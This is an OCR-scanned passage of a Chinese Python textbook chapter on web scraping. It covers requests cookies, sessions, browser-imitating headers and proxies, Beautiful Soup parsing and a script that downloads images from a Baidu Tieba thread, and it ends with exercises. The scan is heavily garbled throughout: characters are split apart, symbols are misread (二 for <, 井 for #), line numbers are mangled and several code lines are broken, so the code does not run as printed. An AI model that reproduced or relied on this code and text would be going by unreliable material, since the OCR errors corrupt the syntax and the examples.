Length": " 158", \ n " Content — Type": " multipart/form 一 data; boundary = 
7db4f97bde09446388d272d1b35abae3", \n "Host": "httpbin. org", \n "User - Agent": "python— 
requests/2.12.4"\n }, \n "json": nmull, \n "origin": "223. 102.0.34", \n "url": "http:// 
httpbin. org/post"\n} \n’ 
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14.3.4 Cookies 与 Session 

在 使 用 requests 抓 取 网 页 的 过 程 中 也 会 遇 到 Cookies 与 Session 的 问题 ,下 面 介 绍 一 下 
Cookies 的 获取 、 设 置 以 及 Session 的 使 用 。 

1. 获取 响应 中 的 Cookies 

抓 取 网 页 的 过 程 中 ,可 能 会 包含 Cookies, 获 取 Cookies 值 对 抓 取 网 页 来 说 会 是 非常 有 
帮助 的 。 


r = requests.get('http://www.baidu. com') 
>>> r.cookies 


< RequestsCookieJar[ Cookie (version = 0, name = 'BDORZ', value = '27315', port = None, port_ 
specified= False, domain= '. baidu. com', domain specified= True, domain initial dot = True, 
path = '/', path specified= True, secure= False, expires= 1486419675, discard= False, comment 
= None, comment url = None, rest = {}, rfc2109 = False) ]> 


可 以 看 出 响应 中 包含 CookieJar 格式 的 Cookies 值 , 键 为 BDORZ, 值 为 27315。 获 取 的 
Cookies ,可 以 用 keys() 方 法 和 values() 方 法 看 内 容 , 以 下 使 用 打印 字典 方式 查看 Cookies: 


>>> r. cookies. keys() 

['BDORZ'] 

>>> r. cookies. values() 

['27315'] 

>>> print({c. name: c.value for c in r.cookies}) 


{'BDORZ': '27315'} 


也 可 以 使 用 : 
>>> print('; '.join(['= ". join(item) for item in cookies. items()])) 


BDORZ = 27315 


2. Cookies 的 设置 
要 想 发 送 Cookies 到 服务 器 ,需要 先 定义 一 个 字典 赋值 给 Cookies, 然 后 使 用 requests 
的 Cookies 参数 传递 数据 : 


>>> url = 'http://httpbin. org/cookies' 

>>> cookies = dict(username = 'lisi', password = '123456') 
>>>r = requests.get(url, cookies = cookies) 

>>> r. text 


'{\n "cookies": {\n "password": "123456", \n "username": "lisi"\n }\n}\n' 


3. 使 用 Session 
抓 取 网 页 的 过 程 中 也 会 用 到 Session 会 话 对 象 .会 话 对 象 让 用 户 能 够 跨 请 求 保持 某 些 
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参数 , 它 也 会 在 同一 个 Session 实例 发 出 的 所 有 请 求 之 间 保 持 Cookies。 所 以 如 果 向 同一 主 
机 发 送 多 个 请 求 , 底 层 的 TCP 连接 将 会 被 重用 ,从 而 带 来 显著 的 性 能 提升 。 
使 用 Session 会 话 对 象 ,需要 先 初 始 化 一 个 Session 对 象 ,如 s 二 requests. Session() ， 
然后 使 用 这 个 Session 对 象 来 进行 访问 ,r = s. post(url,data = loaddata) 。 
下 面 的 会 话 中 通过 两 次 请 求 ,设置 了 两 个 Cookies 键 值 对 ,最 后 获取 了 整个 会 话 中 的 
Cookies 值 。 


>>> s = requests. Session() 
>>> s.get( 'http://httpbin. org/cookies/set/username/lisi') 


< Response [200]> 


>>> s. get( 'http://httpbin. org/cookies/set/password/123456') 


<Response [200]> 


>>r = s.get("http://httpbin. org/cookies") 
>>> r. text 


'{Nn "cookies": {\n "password": "123456", \n "username": "lisi"\n }\nj\n' 


14.3.5 定制 请 求 头 Headers 


抓 取 Web 网 页 时 ,会 涉及 请 求 头 Headers, 如 伪装 成 浏览 器 欺骗 某 些 只 允许 自然 人 浏 
览 的 网 站 ,网 站 是 否 压 缩 , 设 置 代 理 服务 器 绕 过 防火 墙 等 ,而 这 些 都 需要 设置 请 求 头 
Headers 的 一 些 参数 。HTTP 请 求 与 响应 过 程 请 参见 13. 1. 2 小 节 内 容 。 

HTTP Headers 允许 客户 端 与 服务 器 端 使 用 Request 或 Response 传递 额外 信息 ,这 些 
信息 包括 状态 码 、 浏 览 器 名 和 版 本 号 、 操 作 系 统 名 和 版 本 号 、 支 持 的 语言 .指定 是 否 压缩 、 编 
码 方式 、Cookies 等 ,常见 的 Headers 参数 如 表 14-2 所 示 。 


表 14-2 常见 的 Headers 参数 



































参数 描 述 
Accept 浏览 器 可 接受 的 MIME 类 型 
Accept-Charset 浏览 器 可 接受 的 字符 集 
Accept-Encoding 浏览 器 能 够 进行 解码 的 数据 编码 方式 ,如 gzip 
Accept-Language 浏览 器 所 希望 的 语言 种 类 
Authorization 授权 信息 ,通常 出 现在 对 服务 器 发 送 的 WWW-Authenticate 头 的 应 答 中 
Connection 表示 是 否 需 要 持久 连接 
Content-Length 请 求 消息 正文 的 长 度 
Cookie 包含 Cookie 信息 
From 请 求 发 送 者 的 E-mail 地 址 
Host 初始 URL 中 的 主机 和 端口 
User-Agent 浏览 器 类 型 





下 面 用 Google 的 Chrome 浏览 http://httpbin. org/headers, 网 页 会 返回 请 求 Headers 
内 容 ,看 一 下 会 包括 哪些 参数 。 
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"headers": { 
"Accept": "text/html,application/xhtm] + xml, application/xml;q = 0.9, image/webp, * /* ;q 
=0.8", 
"Accept — Encoding" : "gzip, deflate, sdch", 
"Accept ~ Language" : "zh— CN,zh;q= 0.8", 
"Cookie": " ga=GAl.2.290872094.1486369230; gat=1", 
"Host": "httpbin. org", 
"Referer" : "http://httpbin. org/", 
"Upgrade - Insecure — Requests": "1", 
"User - Agent": "Mozilla/5.0 (Windows NT 6. 1; WOW64) AppleWebKit/537. 36 (KHTML, like 
Gecko) Chrome/55.0.2883.87 Safari/537.36" 
} 
b 


如 果 想 为 请 求 添加 HTTP 头 部 ,只 要 简单 地 传递 一 个 dict 给 Headers 参数 就 可 以 了 。 
下 面 来 看 一 个 例子 。 

模拟 浏览 器 抓 取 数据 

设置 请 求 头 来 模拟 浏览 器 是 抓 取 网 页 时 经 常 使 用 的 方法 。 


>>> import requests 

>>> headers = {"User - Agent": "Mozilla/5. 0 (Windows NT 6. 1; WOW64) AppleWebKit/537. 36 
(KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" } 

>>>r = requests. get("http://www. httpbin. org", headers = headers) 

>>> r. text 


14.3.6 代理 访问 
采集 时 为 避免 IP 被 封 ,经 常会 使 用 代理 ; 某 些 网 络 被 防火 墙 阻挡 ,不 能 访问 ,这 时 也 可 
以 使 用 代理 服务 器 。requests 通过 proxies 属性 来 设置 代理 。 


>>> import requests 
>>> proxies = {"http": "http://10.10.10.10:3128", "https": "http://10.10.10.10:1080"} 
>>> requests. get ("http://www. google. com", proxies = proxies) 


如 果 代理 需要 账户 和 密码 , 则 可 以 如 下 设置 : 
>>> proxies = { "http": "http://user:pass@10.10.10.10:3128/"} 
从 注意 : 这 里 的 代理 服务 器 需要 自己 在 网 络 查找 或 架设 。 


除了 基本 的 HTTP 代理 外 ,requests 还 支持 SOCKS 的 代理 。 这 是 一 个 可 选 功 能 , 若 要 
使 用 ,需要 安装 第 三 方 库 。 


$ pip install requests[socks] 
使 用 SOCKS 代理 和 使 用 HTTP 代理 一 样 简单 : 


proxies = { 


"http': 'socks5://user:pass@host:port', 


"https': 'socks5://user:pass(@host:port' 


14.4 使 用 Beautiful Soup 分 析 网 页 


14.4.1 Beautiful Soup 基础 


Beautiful Soup 是 一 个 可 以 从 HTML 或 XML 文件 中 抓 取 数 据 的 Python 库 , 它 提供 一 
些 简 单 的 .Python 式 的 函数 用 来 处 理 导航 、 搜 索 、 修 改 分 析 树 等 功能 。 它 是 一 个 工具 箱 , 通 
过 解析 文档 为 用 户 提供 需要 抓 取 的 数据 ,因为 简单 ,所 以 不 需要 多 少 代码 就 可 以 写 出 一 个 完 
整 的 应 用 程序 。 

Beautiful Soup 已 成 为 和 1xml、html5lib 一 样 出 色 的 Python 解释 器 ,为 用 户 灵活 地 提供 
不 同 的 解析 策略 或 强劲 的 速度 。 

Beautiful Soup 的 官网 是 https://www. crummy. com/software/BeautifulSoup/ ,最 新 
版 本 是 4. 5. 3, 支 持 Python 2. x 和 3. x 版 本 , Beautiful Soup 的 中 文 文档 位 于 https:// 
www. crummy. com/ software/ BeautifulSoup/bs4/doc. zh/ 。 

Beautiful Soup 自动 将 输入 文档 转换 为 Unicode 编码 ,输出 文档 转换 为 UTF-8 编码 。 
你 不 需要 考虑 编码 方式 ,除非 文档 没有 指定 一 个 编码 方式 ,这 时 , Beautiful Soup 就 不 能 自 
动 识别 编码 方式 了 。 然 后 ,你 仅仅 需要 说 明 一 下 原始 编码 方式 就 可 以 了 。 

Beautiful Soup 的 安装 方式 是 


$ pip install beautifulsoup4 


Beautiful Soup 对 HTML 的 解析 ,遵照 文档 对 象 模型 (DOM) 的 描述 ,使 用 节点 树 的 方 
式 对 HTML 文档 进行 解析 。 这 里 继续 使 用 14. 1. 2 小 节 介 绍 的 网 页 的 结构 介绍 Beautiful 
Soup 的 使 用 方法 。 

1. Beautiful Soup 的 对 象 


Beautiful Soup 将 复杂 的 HTML 文档 转换 成 一 个 复杂 的 树 形 结构 ,每 个 节点 都 是 
Python 对 象 , 所 有 对 象 可 以 归纳 为 4 种 : Tag、NavigableString、Beautiful Soup、Comment。 

1) Tag 对 象 

Tag 对 象 也 就 是 HTML 的 标签 ,可 以 通过 标签 名 直接 访问 它 。 如 : 


>>> from bs4 import BeautifulSoup 
>>> html = '''<! DOCTYPE html > 
< htm]l > 
< head > 
< meta http - equiv = "Content - Type" content = "text/html; charset = UTF— 8" /> 
<title> HTML 结构 示例 </title> 
</head> 
<body> 
< img src = "image01. png" width = "104" height = "142"> 
<hl > 我 的 第 一 个 标题 </hl > 
<p> 我 的 第 一 个 段落 。</p> 
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<a class = "university"” href = "http://www. tsinghua. edu. cn/"> 清 华 大 学 </a> 
</body > 
</html > 


>>> soup = BeautifulSoup(html) 


使 用 Beautiful Soup 时 , 它 会 选择 最 合适 的 解析 器 来 解析 HTML 文档 ,如 果 手 动 指 定 
解析 器 ,那么 Beautiful Soup 会 选择 指定 的 解析 器 来 解析 文档 , 若 已 经 安装 lxml 库 , 上 面 的 
代码 则 可 以 写 为 





> som = BeautifulSoup(himl, "lxml') 
Beautiful Soup 可 以 使 用 prettify() 方 法 格式 化 HTML 文档 内 容 , 如 : 


>>> print(soup. prettify()) 
>>> soup.a.attrs 


{'class': ['university'], 'href': ‘http://www.tsinghua. edu.cn/'} 


>>> print(soup. prettify()) 


<! DOCTYPE html > 
<html> 
<head> 
< meta content = "text/html; charset = UTF - 8" http - equiv= "Content - TYpe"/> 
<title> 
HTML 结构 示例 
</title> 
</head> 
<body> 
< img height = "142" src = "image01. png" width = "104"/> 
<hl > 
我 的 第 一 个 标题 
</hl > 
<p> 
我 的 第 一 个 段落 。 
</p> 
<aclass = "university" href = "http://www.tsinghua. edu. cn/"> 
清华 大 学 
</a> 
</body> 
</html > 


>>> soup. title 


<title> HTML 结构 示例 </title> 


>>> soup. head 


<head> 

<meta content = "text/html; charset = UTF - 8" http - equiv = "Content — Type"/> 
<title> HTML 结构 示例 </title> 

</head> 


>>> soup.a 
<aclass = "university"” href = "http://www. tsinghua. edu. cn/"> 清 华 大 学 </a> 


>>> soup.p 


<p> 我 的 第 一 个 段落 。</p> 


对 于 Tag 对 象 , 它 有 两 个 重要 的 属性 ,分 别 是 name 和 attrs, 下 面 分 别 来 感受 一 下 。 
>>> soup.a. name 

‘a 

>>> soup.a.attrs 

{'class': ['university'], ‘href': 'http://www.tsinghua. edu. cn/'} 

2) NavigableString 对 象 


既然 已 经 得 到 了 标签 的 name'、attrs, 那 么 如 何 获 取 标 签 内 部 的 文字 ? 很 简单 ,用 
. string 即 可 获得 。 例 如 : 


>>> soup.a. string 


' 清 华 大 学 ' 


>>> soup. title. string 


'HTML 结构 示例 ' 


3) Beautiful Soup 对 象 
Beautiful Soup 对 象 表示 的 是 一 个 文档 的 全 部 内 容 。 大 部 分 时 候 , 可 以 把 它 当 作 Tag 
对 象 ,是 一 个 特殊 的 Tag ,可 以 分 别 获 取 它 的 类 型 ,名称 和 属性 。 


>>> print(type( soup. name) ) 
<class 'str> 

>>> print( soup. name) 
[document] 


>>> print(soup.attrs) 


{} # 空 字典 


4) Comment 对 象 
Comment 对 象 是 一 个 特殊 类 型 的 NavigableString 对 象 .其 实 输出 的 内 容 仍然 不 包括 
注释 符号 ,但 是 如 果 不 很 好 地 处 理 它 ,可 能 会 对 文本 处 理 造 成 意 想不到 的 麻烦 。 


>>> markup = "<b><! -- Hey, buddy. Want to buy a used parser? -一 ></b>" 
>>> soup markup = BeautifulSoup(markup) 
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>>> comment = soup markup.b. string 
>>> comment 


'Hey, buddy. Want to buy a used parser?" 


>>> type( comment) 


<class 'bs4.element. Comment'> 


2. 遍历 节点 树 

1) 直接 子 节点 

网 页 节点 树 中 某 节点 的 子 节点 涉及 节点 的 . contents、 children 属性 ,节点 的 . content 
属性 可 以 将 节点 的 子 节点 以 列表 的 方式 输出 : 





>>> soup. head. contents 

['\n', <meta content = "text/html; charset = UTF - 8”http - equiv = "Content - Type"/>, '\n', < 

title> HTML 结构 示例 </title>，'\n'"] 

. children 属性 返回 的 不 是 一 个 list, 不 过 可 以 通过 遍历 获取 所 有 子 节点 。 打 印 输出 
. children 看 一 下 ,可 以 发 现 它 是 一 个 list 生成 器 对 象 。 

>>> print(soup. head. children) 


< 1list_iterator object at 0x00000000037C6358 > 


因此 可 以 遍历 它 : 


>>> for child in soup. head. children: 
print(child) 


< meta content = "text/html; charset = UTF - 8" http - equiv = "Content — Type"/> 


< title> HTML 结构 示例 </title> 


2) 所 有 子孙 节点 

. contents 和 . children 属性 仅 包含 Tag 的 直接 子 节点 ,. descendants 属性 可 以 对 所 有 
Tag 的 子孙 节点 进行 递归 循环 ,和 . children 类 似 , 也 需要 遍历 获取 其 中 的 内 容 。 

>>> for child in soup. descendants : 

print(child) 

以 上 代码 可 以 遍历 HTML 文档 的 所 有 子孙 节点 ,由 于 内 容 较 多 ,这 里 就 不 再 显示 其 结 
梁 了 于 < 

3) 节点 内 容 

获取 节点 内 容 , 可 以 使 用 . string。 如 果 一 个 标签 里 面 没有 子 标签 了 .那么 . string 就 会 
返回 标签 里 面 的 内 容 。 如 果 标 签 里 面 只 有 唯一 的 一 个 标签 了 ,那么 . string 也 会 返回 最 里 面 
的 内 容 。 例 如 : 
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>>> soup.title 
<title> HTML 结构 示例 </title> 
>>> print(soup.title. string) 


如 果 节 点 下 有 多 个 子 节点 , 则 . string 会 返回 None: 


>>> print(soup. head. string) 
None 


4) 多 个 内 容 
车 节点 有 多 个 内 容 可 通过 . strings 属性 获取 ,遍历 获取 的 方法 请 参见 下 面 的 代码 ; 


>>> for string in soup. body. strings: 
print(string) 





若 获 取 的 属性 中 含有 很 多 的 空 行 和 空格 , 则 可 以 使 用 . stripped_strings 去 除 多 余 空 白 内 容 。 


>>> for string in soup. body. stripped_strings: 
print(string) 





5) 父 节点 
通过 . parent 属性 可 以 获取 某 节点 的 父 节点 。 


>>> node = soup.a 
>>> print(node. parent. name) 





6) 所 有 父 节 点 
通过 . parents 属性 可 以 获取 某 节点 的 所 有 父 节点 。 


>>> for obj in node. parents : 
print(obj. name) 
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7) 兄弟 节点 
兄弟 节点 可 以 理解 为 和 本 节点 处 在 同一 级 的 节点 ,. next_sibling 属性 获取 了 该 节点 的 
下 一 个 兄弟 节点 ,. previous_sibling 则 与 之 相反 ,如 果 节 点 不 存在 , 则 返回 None。 


>>> soup. body.a.next_sibling 
An' 
>>> soup. body.a.previous_sibling 


a 


从 上 面 的 例子 可 以 看 出 ,实际 文档 中 的 Tag 的 . next_sibling 和 . previous_sibling 属性 
通常 是 字符 串 或 空白 。 
8) 全 部 兄弟 节点 
通过 . next_siblings 和 . previous_siblings 属性 可 以 访问 当前 节点 的 全 部 兄弟 节点 ,但 
需 迭 代 获 取 每 个 节点 。 
>>> for sibling in soup. body.a. next_ siblings: 
print(repr(sibling)) 


An 


>>> for sibling in soup. body.a. previous_siblings: 
print(repr(sibling)) 

Nm 

<p> 我 的 第 一 个 段落 。</p> 

ANn' 

<hl > 我 的 第 一 个 标题 </hl > 

An' 

< img height = "142" src = "image01. png" width = "104"/> 

WAN 


9) 前 后 节点 
. next _ element、. previous _element 属性 获取 节点 的 前 后 节点 , 与 . next_ sibling、 
. previous_sibling 不 同 , 它 并 不 是 针对 兄弟 节点 ,而 是 在 所 有 节点 ,不 分 层次 。 


>>> soup. head 


<head> 

< meta content = "text/html; charset = UTF - 8" http - equiv= "Content — Type"/> 
< title> HTML 结构 示例 </title> 

</head> 


>>> soup. head. next_element 
An 


>>> soup. head. previous element 


An' 


10) 所 有 前 后 节点 
通过 . next_elements 和 . previous_elements 的 迭代 器 就 可 以 向 前 或 向 后 访问 文档 的 解 


析 内 容 , 就 好 像 文 档 正 在 被 解析 一 样 。 


>>> for element in soup. body.a. next elements: 
print(repr(element)) 


' 清 华 大 学 ' 

nN 

An' 

An' 

3. 搜索 文档 树 

find_al1( name, attrs, recursive, text, ** kwargs ) 

find_all() 方 法 搜索 当前 Tag 的 所 有 Tag 子 节点 ,并 判断 是 否 符合 过 滤器 的 条 件 。 

1) name 参数 

name 参数 可 以 查找 所 有 名 字 为 name 的 Tag, 字 符 串 对 象 会 被 自动 忽略 。 

(1) 搜索 标签 字符 串 。 最 简单 的 过 滤器 是 字符 串 。 在 搜索 方法 中 传人 一 个 字符 串 参 
数 ,Beautiful Soup 会 查找 与 字符 串 完 整 匹配 的 内 容 。 下 面 的 例子 用 于 查找 文档 中 所 有 的 
二 a 标签: 

>>> soup. find all('a') 


[<a class = "university" href = "http://www.tsinghua.edu. cn/"> 清 华 大 学 </a>] 


(2) 根据 正则 表达 式 搜索 。 如 果 传 入 正则 表达 式 作 为 参数 ,Beautiful Soup 会 通过 正则 
表达 式 的 match() 方 法 来 匹配 内 容 。 下 面 例 子 中 找 出 所 有 含 t 的 标签 ,这 表示 过 html 二 、 
二 meta 王 和 < 过 title 二 标签 都 应 该 被 找到 : 

>>> for tag in soup. find all(re. compile("t")): 

print(tag. name) 


html 
meta 
title 


(3) 搜索 列表 。 如 果 传 人 列表 参数 ,Beautiful Soup 会 将 与 列表 中 任 一 元 素 匹配 的 内 容 
返回 。 下 面 代 码 找到 文档 中 所 有 的 二 a 二 标签 和 二 p 二 标签 。 


nm mon 


>>> soup. find all(["a","p"]) 
[<p> 我 的 第 一 个 段落 。</p>, <a class = "university" href = "http://www.tsinghua. edu. cn/"> 清 
华 大 学 </a>] 


(4) 搜索 True。True 可 以 匹配 任何 值 ,下 面 代码 查找 到 所 有 的 Tag, 但 是 不 会 返回 字 
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符 串 节点 。 


>>> for tag in soup. find all(True): 
print(tag. name) 


(5) 根据 方法 搜索 。 如 果 没 有 合适 过 滤器 ,那么 还 可 以 定义 一 个 方法 ,方法 只 接收 一 
个 元 素 参 数 , 如 果 这 个 方法 返回 True, 表 示 当 前 元 素 匹 配 并 且 被 找到 ; 如 果 不 是 则 返回 
False。 
下 面 方法 校 验 了 当前 元 素 , 如 果 包 含 class 属性 却 不 包含 id 属性 ,那么 将 返回 True: 
>>> def has_class_but_no_id(tag) : 
return tag. has_attr( 'class') and not tag. has_attr('id'") 
>>> soup. find_al1(has_class_but_no_id) 


[<a class = "university" href = "http://www.tsinghua,edu. cn/"> 清 华 大 学 </a>] 


2) keyword 参数 
如 果 一 个 指定 名 字 的 参数 不 是 搜索 内 置 的 参数 名 ,搜索 时 会 把 该 参数 当 作 指定 名 字 
Tag 的 属性 来 搜索 。 如 果 传 人 href 参数 ,Beautiful Soup 会 搜索 每 个 Tag 的 href 属性 。 


>>> soup. find_al1(href = re. compile("tsinghua")) 


[<a class = "university"” href = "http://www. tsinghua. edu. cn/"> 清 华 大 学 </a>] 


3) text 参数 

通过 text 参数 可 以 搜索 文档 中 的 字符 串 内 容 。 与 name 参数 的 可 选 值 一 样 ,text 参数 
接受 : 字符 串 正则 表达 式 ,列表 、True。 

4) limit 参数 

find_all() 方 法 返回 全 部 的 搜索 结果 , 当 文档 树 很 大 时 ,搜索 会 很 慢 。 如 果 不 需 要 全 部 
结果 ,可 以 使 用 limit 参数 限制 返回 结果 的 数量 ,效果 与 SQL SELECT 查询 中 的 limit 关键 
字 类 似 , 当 搜索 到 的 结果 数量 达到 limit 的 限制 时 ,就 会 停止 搜索 返回 结果 。 

>>> for tag in soup. find all(re. compile("t"), limit = 2) : 

print(tag. name) 


html 
meta 


5) recursive 参数 

调用 Tag 的 find_all() 方 法 时 .Beautiful Soup 会 检索 当前 Tag 的 所 有 子孙 节点 ,如 果 
只 想 搜索 Tag 的 直接 子 节点 ,可 以 使 用 参数 recursive 王 False, 如 : 

>>> print(soup. find all('title')) 

[< title > HTML 结构 示例 </title >] 

>>> print(soup. find all("title", recursive = False)) 

[] 

从 上 面 的 代码 可 以 看 出 ,find_all() 方 法 不 加 recursive 王 False 时 ,能 够 找到 二 title 二 标 
签 ; 而 加 上 之 后 就 找 不 到 了 。 从 上 文 可 知 ,soup 是 指 网 页 文档 , 它 的 子 节点 是 html, 因 此 加 
recursive 二 False 时 返回 空 值 。 

除了 find_all() 方 法 外 ,还 有 以 下 一 些 方法 。 

2 find(): 返回 查找 的 结果 。 

9 find_parents(): 搜索 当前 节点 的 所 有 父辈 节点 。 
find_parent() : 搜索 当前 节点 的 父辈 节点 。 
find_next_siblings(): 返回 所 有 符合 条 件 的 后 面 的 兄弟 节点 。 
find_next_sibling(): 只 返回 符合 条 件 的 后 面 的 第 一 个 Tag 节点 。 
find_previous_siblings(): 返回 所 有 符合 条 件 的 前 面 的 兄弟 节点 。 
find_previous_sibling() : 返回 第 一 个 符合 条 件 的 前 面 的 兄弟 节点 。 
find_all_next(): 返回 所 有 符合 条 件 的 节点 。 
find_next(): 返回 第 一 个 符合 条 件 的 节点 。 
find_all_previous(): 返回 所 有 符合 条 件 的 前 面 的 节点 。 
find_previous(): 返回 第 一 个 符合 条 件 的 前 面 的 节点 。 
以 上 方法 的 参数 .用 法 与 find_all0) 方 法 的 完全 相同 ,原理 类 似 , 在 此 不 再 袭 述 。 


14.4.2 获取 百度 贴吧 中 的 图 片 


学 习 了 Beautiful Soup 分 析 网 页 以 后 ,可 以 使 用 该 工具 包 进 行 一 些 实际 抓 取 数 据 的 工 
作 了 。 下 面 以 百度 贴吧 为 例 , 抓 取 百度 贴吧 的 图 片 。 百 度 贴 吧 是 百度 旗下 的 独立 品牌 ,全 球 
最 大 的 中 文 社区 。 它 结合 搜索 引擎 建立 了 一 个 在 线 的 交流 平台 ,让 那些 对 同一 个 话题 感 兴 
趣 的 人 们 聚集 在 一 起 ,方便 地 展开 交流 和 互相 帮助 。 贴 吧 有 许多 主题 ,每 个 主题 有 一 个 ID 
号 ,访问 的 URL 为 http://tieba. baidu. com/p/3805717173, 其 中 的 3805717173 为 考研 吧 
的 ID, 贴吧 中 有 多 个 页 面 ,每 个 页 面 的 URL 为 http://tieba. baidu. com/p/3805717173? 
pn 一 4,4 为 第 4 个 页 面 ,因此 ,只 要 获取 每 个 贴吧 的 总 页 面 数 ,通过 http://tieba. baidu. 
com/p/3805717173? pn 一 n 就 能 访问 第 n 个 页 面 了 。 

1. 获取 贴吧 总 页 数 

打开 http://tieba. baidu. com/p/3805717173 贴吧 页 面 , 在 Chrome 浏览 器 中 ,选择 工 
具 栏 最 右 侧 下 拉 菜 单 中 的 “更 多 工具 ”一 “开发 者 工具 ”命令 ,打开 “开发 者 工具 ” 窗 格 ,在 
Web 页 面 中 找到 “ 共 27 页 ”, 右 击 并 选择 弹出 菜单 中 的 “检查 ”命令 ,在 Elements 选项 卡 中 
可 以 看 到 对 应 的 元 素 二 span class= "red" 二 27 一 /span 二 ,如 图 14-4 所 示 , 这 就 是 我 们 要 找 
的 源 代码 ,在 其 上 右 击 ,选择 弹出 菜单 中 的 Copy 一 Copy outerHTML 命令 , 即 可 复制 源 代 


0 0900000 0°09 
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码 。 转 换 为 正则 表达 式 为 二 span class="red" 二 ([0-9] 十 ) 一 /span 二 ,通过 正则 表达 式 就 可 
以 匹配 到 最 大 页 数 。 









罩 看 站 





回 男 片 。 俯 精 品 。 @ 视频 


上 12345678910 下 页 





回复 ; 同学 们 ， 来 爆 一 爆 你 们 的 录取 通知 蔬 啊 } 


@ tnensuz 


为 兴趣 而 生 ， 贴 吧 更 懂 你 。 








图 14-4 “ 共 n 页 ”对 应 的 源 代码 


2. 获取 每 个 页 面 图 片 的 链接 


在 贴吧 的 页 面 中 ,找到 图 片 右 击 ,选择 弹出 菜单 中 的 “检查 ”命令 ,在 Elements 选项 卡 中 
找到 对 应 的 对 象 右 击 ,在 弹出 菜单 中 选择 Copy 一 Copy outerHTML 命令 ,得 到 类 似 于 下 面 
的 代码 : 


< img class =" BDE _ Image" src = " http://imgsrc. baidu. com/forum/w% 3D580/sign = 
d9e7a4fbd41373f0f53f6f97940e4b8b/d2fbla4c510fd9f9df8e69e9202dd42a2934a493. jpg" pic_ext 
= "jpeg" changedsize = "true" width = "560" height = "746" style = "cursor: url(&quot;http:// 
tb2. bdstatic. com/tb/static - pb/img/cur_zin. cur&quot; ), pointer;"> 


其 中 的 src 为 图 片 的 URL 地 址 ,通过 BeautifulSoup. findall('img',class_ = 'BDE_ 
Image') , 即 能 找到 所 有 Img 标签 。 
例 [ch14 4 2.py】 


间 ~*# 一 coding:utf-8 一 一 


import requests 

import re 

from bs4 import BeautifulSoup 
import time 


# 获 取 网 页 内 容 

def getHtml (num) : 

10. headers = { 'User - Agent':u'Mozilla/5.0 (Windows NT 6. 1; rv:38.0) Gecko/20100101 
Firefox/38.0'} 

11. baseURL = 'http://tieba. baidu. com/p/3805717173?pn = ' # 这 是 抓 取 页 面 的 基础 地 址 , = 
后 为 贴吧 页 码 


Dowaouww wb 
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上 url = baseURL + str(num) 

EK htmltext = requests. get (url, headers = headers) . text 
14. return htmltext 

5s 


16， 井 获取 贴吧 页 面 总 数 
17. def getPageNum( ) : 


18. htmltext = getHtml(1) 

19. pattern = re.compile('< span class= "red">([0—9]+)</span>') 
20. result = int(re.findall(pattern, str(htmltext))[0]) 

交 print(" 共 {} 页 ". format(result)) 

22. return result 

23， 

24， 井 保存 图 片 

25. def saveImage( imageNum, imgUr1l) : 

26. DstDir = "D:\\temp\\" 井 保存 图 片 的 目录 
27， imageName = str( imageNum) + '. jpg’ 井 图 片 文件 名 

28. response = requests.get(imgUr1，stream = True)# 获取 图 片 

29. image = response.content 井 图 片 内 容 

30. realname = DstDir + imageName 

3 try: 

32. with open(realname, "wb") as jpg: 

3 jpg. write( image) 

34. except IOError : 

I print("IO Error\n") 

36. finally: 

9% jpg. close 

38. #time. sleep(1) # 休 眼 1s, 模 仿 人 的 访问 方式 
39; 


40. # 获 取 各 页 图 片 
41. def getImages(pagenum) : 


42. filenum = 1 
43. for pagenum in range(1, pagenum + 1): 
44. htm] = getHtm] (pagenum) 
5 Soup = BeautifulSoup(html, 'lxml') 
46. admissions = Soup.find all('img',class_ = 'BDE_Image') 井 通知 书 地 址 所 在 地 
47. for each in admissions : 
48. eachurl = each. get( 'src') 
49. saveImage(filenum, eachurl) 
50. filenum = filenum+ 1 
5 print(".",end= "') # 程 序 运行 时 间 较 长 ,以 ". "表示 运行 进度 
52. 
53. pagenum = getPageNum() 并 取得 网 页 总 页 数 
54. getImages(pagenum) # 获取 贴吧 中 的 图 片 
习 题 
一 、 判断 题 


1. HTML 网 页 中 指定 网 页 编码 方式 的 属性 为 charset。 ( 了 
2. HTML 网 页 中 表示 超级 链接 的 属性 为 <img src 一 
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3. HTML 网 页 中 表示 标题 的 属性 为 二 head> 标 题 一 /head> 。 ) 

4. Beautiful Soup 库 的 主要 功能 是 对 HTML 文档 进行 分 析 。 ( ) 

5. reduests 库 的 主要 功能 是 简单 方便 地 读 取 网 页 内 容 。 ( ) 
( ) 

( ) 


6. requests 库 可 以 通过 设置 请 求 头 来 模拟 浏览 器 抓 取 网 页 。 
7. 用 requests 可 以 设置 会 话 的 Cookies。 
二 、 选 择 题 
1. urllib 包 中 用 于 打开 和 读 取 URL 资源 的 模块 为 ( “)。 
A. request B. error C. parse D. robotparser 
2. 获取 网 页 编码 方式 的 诸多 方法 中 ,最 不 靠 谱 的 方法 是 ( j, 
A. 直接 用 UTF-8 解码 B. 根据 网 页 中 的 charset 属性 解码 


C. 根据 chardet. detect() 返 回 值 解码 D. 根据 人 工 判断 确定 解码 方式 
3 Beautiful Soup 库 中 常用 ( ) 方 法 查找 特定 的 元 素 。 

A. find_all() B. find() 

C. find_next() D. find_next_sibling() 
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